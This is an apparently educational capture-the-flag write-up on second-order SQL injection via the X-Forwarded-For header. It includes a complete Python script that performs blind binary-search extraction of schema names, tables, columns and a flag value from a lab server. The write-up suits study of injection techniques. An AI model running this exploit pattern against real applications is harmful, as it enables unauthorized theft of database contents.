Knowledge point: second-order injection
Looking at the page, you can see the current IP being displayed. I guessed it was taken from X-Forwarded-For or Client-IP; testing confirmed it is X-Forwarded-For.
For example, if we add the header X-Forwarded-For: 127.0.0.1, the page shows both the current IP and the previous IP, which strongly suggests a second-order injection.

Test:
First submit the injection string; it is shown in the current-IP position.


Then submit another IP; the injection string now appears in the last-IP field, which means it has been written to the database.

Now submit that same IP once more. Because the current IP equals the one submitted last time, the application looks up the previously stored IP in the database, and that stored string is used in the query, so our injection executes.
exp:
import requests

url = "http://node4.buuoj.cn:28728/"
header = {
    'Cookie': 'track_uuid=dcc1bf90-e17d-469b-c95b-15958a410f29',
    'X-Forwarded-For': ''
}
name = ""
i = 0
while True:
    # Binary search over printable ASCII for the i-th character of the result.
    head = 32
    tail = 127
    i += 1
    while head < tail:
        mid = (head + tail) >> 1
        #payload = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i, mid)
        #payload = "0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e'),{0},1))>{1} or '0".format(i, mid)
        #payload = "0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='F4l9_t4b1e' and table_name='FLAG_TABLE'),{0},1))>{1} or '0".format(i, mid)
        payload = "0' or (ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(i, mid)
        # Request 1: the payload is stored as the "current" IP.
        header["X-Forwarded-For"] = payload
        html_0 = requests.post(url, headers=header)
        # Request 2: a harmless IP pushes the payload into the "last IP" slot.
        header["X-Forwarded-For"] = "111"
        html_1 = requests.post(url, headers=header)
        # Request 3: the same IP again, so the stored payload is used in the lookup query.
        html_2 = requests.post(url, headers=header)
        # The lookup only returns the "111" row when the comparison is true.
        if "Last Ip: 1" in str(html_2.text):
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        name += chr(head)
        print(name)
    else:
        # No printable character matched: the result has been read completely.
        break